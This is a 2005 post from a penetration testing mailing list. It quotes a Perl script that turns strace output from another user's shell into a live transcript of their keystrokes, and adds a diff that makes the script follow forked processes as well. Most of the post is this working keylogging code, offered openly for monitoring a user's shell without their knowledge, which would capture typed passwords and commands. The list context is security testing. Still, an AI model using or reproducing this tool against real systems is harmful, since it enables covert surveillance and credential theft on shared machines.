Penetration Testing mailing list archives
Re: Keystroke logging with strace (no setup required)
From: Can't dig that daddy <cdtdaddy () hotmail it>
Date: Mon, 18 Jul 2005 12:28:28 +0000
A little patch I'm using to "follow" forking processes... Have a nice day, Can't dig that daddy. ---------snip----------------- 20c20 < open (F, "tail -f $ARGV[0] |"); ---
open (F, "strace -p $ARGV[0] 2>&1 |");
22c22 < next if !/^read/; ---
next if !/^read/ && !/^clone/;
37a38,40
} elsif (/^clone\(.+,\s.+,\s.+\)\s=\s(\d+)/) { system("/usr/bin/perl -w $0 $1");
---------snip----------------- Alle 16:59, martedì 12 luglio 2005, Lachniet, Mark ha scritto:
Apparently Tom's original message never made it to the list, but I think this is well worth the bandwidth to share. Tom wrote a quick Perl script to parse the output from strace, so you could use the method I described a little (lot) more conveniently. I haven't tested it but it looks pretty straight forward. Sorry bout the line breaks but I didn't want to send an attachment. Mark Lachniet ---------snip----------------- #!/usr/bin/perl -w # # Monitoring a user's shellcommands by using strace and displaying and cleaning up the read() syscalls # Based on the tip posted to secfocus by Mark Lachniet, written by Tom Van de Wiele. # # To be used on a logfile or in real-time (as fast as /usr/bin/script logs to file that is) like this: # # # script /tmp/what_is_user_foo_doing.log # Script started, file is /tmp/what_is_user_foo_doing.log # # strace -p <PID of shell of user> # # Using a different terminal at the same time: # # perl strace_clean.pl /tmp/what_is_user_doing.log # # use strict; # hi Kris :) my $char; open (F, "tail -f $ARGV[0] |"); while (<F>) { next if !/^read/; next if /^$/; if (/^read\(0,\s\"(.*)\".*/) { $char = $1; if ($char =~ /\\r/) { print "\n"; } elsif ($char =~ /\\177/) { print "\b"; } elsif ($char =~ /\\t/) { print "<TAB>"; } else { print $char; } } } # EOF
Current thread:
- Keystroke logging with strace (no setup required) Lachniet, Mark (Jul 07)
- <Possible follow-ups>
- RE: Keystroke logging with strace (no setup required) Lachniet, Mark (Jul 12)
- Re: Keystroke logging with strace (no setup required) rootsuid (Jul 12)
- Re: Keystroke logging with strace (no setup required) Can't dig that daddy (Jul 18)